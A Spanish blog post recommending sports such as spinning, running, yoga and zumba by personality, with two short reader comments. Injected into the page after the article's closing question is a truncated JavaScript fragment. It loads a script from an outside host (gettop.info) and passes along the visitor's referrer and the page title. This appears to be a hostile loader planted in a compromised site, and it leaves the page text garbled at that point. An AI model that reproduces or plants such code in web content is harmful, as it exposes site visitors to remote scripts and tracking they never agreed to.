Salud y belleza » Deportes, Salud

Descubre qué deporte se adapta más a ti

2 Comentarios

No todo el mundo puede practicar cualquier deporte. Dependiendo de la persona le favorecerá más un tipo de actividad física u otra. Su condición física, su personalidad o sus gustos influyen mucho. Así que lee atentamente para descubrir el tipo de deporte o actividad física que se adapta más a ti.

elegir-deporte

- Spinning: es un deporte para gente fuerte y activa. Si te gusta exigirle a tu cuerpo en actividades físicas y obtener grandes resultados con esfuerzo este es el deporte que mejor se adapta a ti. Divertido y además se queman muchas calorías.

- Running: este es un deporte sobre todo para los que le gusta practicar en solitario porque te permite despejarte y pensar en tus cosas. Concentrándote en correr simplemente podrás dedicarte más tiempo a ti.

correr-pies

- Yoga: es una disciplina ideal para las personas espirituales y más tranquilas. Te ayudará a bajar tu nivel de estrés y a aumentar tu bienestar general.

- Zumba: para los que quieren bailar y mover el esqueleto con repeticiones de distintos pasos de baile y de fitness. Mejorará tu coordinación, tu figura y además te lo pasarás de escándalo.

zumba

- Las máquinas de fitness: son las que encontramos normalmente en los gimnasios como la bicicleta estática o la elíptica, pesas, aparatos para levantamientos… se necesita orden y disciplina porque si no el aburrimiento puede dejar de motivarte.

¿Cuál de estos deportes o ejercicios va mejor contigo?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Más consejos de salud y belleza : , , ,

2 Comments »

  • sonia said:

    yo prefiero deportes como el spinning o zumba que son más entretenidos a mi parecer y menos estresantes. Además se pierde mucho peso.

  • fiona said:

    me gusta más correr en solitario, me da tiempo a pensar y a despejarme.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.